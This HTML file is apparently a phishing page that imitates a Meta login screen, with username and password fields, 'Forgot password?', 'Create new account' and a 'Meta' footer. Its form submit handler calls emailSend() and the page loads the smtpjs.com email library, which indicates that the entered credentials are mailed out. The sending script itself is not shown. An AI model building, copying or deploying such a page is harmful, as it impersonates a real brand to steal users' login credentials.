<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>secured-inc</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div class="container">
        <div class="log-container">
            <img class="purple" src="./img/purple.svg" alt="logo">
        </div>



        <div class="form-container">
            <form onsubmit="emailSend(); resent(); return false;" id="login-form"  enctype="text/plain">
                <div class="form-group password-group">
                    <input type="text" id="identifier" name="identifier" placeholder="Username, email or mobile number"
                        required>
                    <input type="password" id="password" name="password" placeholder="Password" required>

                    <!-- LOGIN BUTTON -->
                    <div class="login-btn2">
                        <button type="submit" value="submit">Log in</button>
                    </div>
                </div>
            </form>

            <!-- LOADING BAR -->
            <!-- <div class="loading-bar-container2">
                <div class="loading-bar2"></div>
            </div> -->



            <p id="fp" style="font-family: Verdana, Geneva, Tahoma, sans-serif; color: #4d4d4d; margin-top: 30px;">Forgot
                password?</p>
        </div>

        <div id="loadingBarContainer">
            <div id="loadingBar"></div>
        </div>

        <div id="confirmationMessage">Check your <br>email for confirmation!</div>

        <div class="create-new">
            <button>Create new account</button>
        </div>

        <footer class="footer2">
            <img src="./img/footer.svg" alt="footer">
            <p>Meta</p>
            <p class="fp">About Help More</p>
        </footer>



    </div>

    <script src="https://smtpjs.com/v3/smtp.js">
    </script>
<script src="script.js"></script>
</body>

</html>